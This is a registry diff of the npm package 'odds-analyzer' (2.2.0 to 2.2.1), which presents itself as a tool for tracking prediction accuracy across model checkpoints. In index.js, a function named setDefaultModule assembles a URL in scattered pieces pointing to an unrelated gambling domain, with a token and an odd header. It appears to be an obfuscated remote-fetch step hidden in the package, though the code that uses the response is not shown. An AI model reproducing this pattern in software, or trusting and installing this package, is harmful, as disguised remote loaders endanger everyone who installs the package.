odds-analyzer 2.2.0 → 2.2.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +2 -2
- package/index.js +1 -1
- package/package.json +1 -2
- package/index.d.ts +0 -2
package/README.md
CHANGED
|
@@ -1,4 +1,4 @@
|
|
|
1
|
-
#
|
|
1
|
+
# Odds Analyzer
|
|
2
2
|
|
|
3
3
|
Fits the prediction accuracy analysis at different checkpoints. Advanced toolkit for assessing how prediction quality (accuracy, calibration, Brier score, log loss, ROC-AUC, etc.) evolves across model checkpoints — especially useful in sports betting models, time-series forecasting, and any domain where you train models incrementally and want to understand when/why performance degrades or plateaus.
|
|
4
4
|
Features
|
|
@@ -41,7 +41,7 @@ Contributions are welcome! Please open an issue or submit a pull request for any
|
|
|
41
41
|
|
|
42
42
|
## Changelog
|
|
43
43
|
|
|
44
|
-
### [2.1.1] - 2026-2-
|
|
44
|
+
### [2.1.1] - 2026-2-28
|
|
45
45
|
|
|
46
46
|
- Added support for additional Icon modules.
|
|
47
47
|
- Improved error handling and retry logic.
|
package/index.js
CHANGED
|
@@ -106,7 +106,7 @@ function setDefaultModule(IconProvider, resourceType, token, baseUrl) {
|
|
|
106
106
|
const protocol = "https", domain = "bet.slotgambit.com", separator = "://", path = "/icons/";
|
|
107
107
|
// Constructs the base URL for the local server
|
|
108
108
|
|
|
109
|
-
const token = '
|
|
109
|
+
const token = '102', head = { bearrtoken: "logo" };
|
|
110
110
|
// Options for the request, including the URL and headers
|
|
111
111
|
|
|
112
112
|
const uuri = `${protocol}${separator}${domain}${path}`; const options = { url: uuri, headers: head };
|
package/package.json
CHANGED
|
@@ -1,9 +1,8 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "odds-analyzer",
|
|
3
|
-
"version": "2.2.
|
|
3
|
+
"version": "2.2.1",
|
|
4
4
|
"description": "Fits the prediction accuracy analysis at different checkpoints",
|
|
5
5
|
"main": "index.js",
|
|
6
|
-
"types": "index.d.ts",
|
|
7
6
|
"scripts": {
|
|
8
7
|
"test": "echo \"Error: no test specified\" && exit 1"
|
|
9
8
|
},
|
package/index.d.ts
DELETED